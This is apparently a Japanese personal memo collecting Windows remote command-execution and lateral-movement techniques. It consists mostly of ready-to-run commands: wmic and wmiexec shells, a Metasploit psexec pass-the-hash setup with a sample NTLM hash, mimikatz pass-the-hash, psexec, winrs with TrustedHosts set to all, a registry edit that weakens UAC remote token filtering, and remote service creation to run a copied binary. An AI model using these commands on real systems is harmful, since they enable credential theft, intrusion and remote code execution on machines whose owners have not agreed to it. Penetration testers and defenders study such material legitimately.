Windowsリモートでcmdコマンドを実行する方法
1992 ワード
自分に役に立つと思って記録しました
WMI実行コマンド(通常の権限はhash伝達可能):
非エコー実行:
Windows hash値を取得し、administratorのhashを取得します.
そしてpsexecを利用してHASH伝達を行う:
3.mimikatzはhash方式接続+at計画タスク実行コマンドを渡す:
4.psexec.exeリモート実行コマンド
5.winrmリモート実行コマンド
6.リモートコマンドscコマンドの実行
WMI実行コマンド(通常の権限はhash伝達可能):
非エコー実行:
wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt"wmiexecツールを使用してリバウンド半インタラクティブshell:cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21 Administrator 1234562.Hashを使用してWindowsに直接ログイン(HASH転送):Windows hash値を取得し、administratorのhashを取得します.
598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
そしてpsexecを利用してHASH伝達を行う:
msf payload:
use exploit/windows/smb/psexec
show options
set RHOST 192.168.81.129
set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
set SMBUser Administrator
show options
run
3.mimikatzはhash方式接続+at計画タスク実行コマンドを渡す:
mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF"
// hash
dir \\192.168.1.185\c$
4.psexec.exeリモート実行コマンド
psexec /accepteula //
sc delete psexesvc
psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe
5.winrmリモート実行コマンド
// winrm , 5985 :
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano|find "5985"
// :
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd
//UAC , , :
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"
6.リモートコマンドscコマンドの実行
net use \\192.168.17.138\c$ "admin123" /user:pt007
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
sc \\192.168.17.138 create test binpath= "c:\test.exe"
sc \\192.168.17.138 start test
sc \\192.168.17.138 del test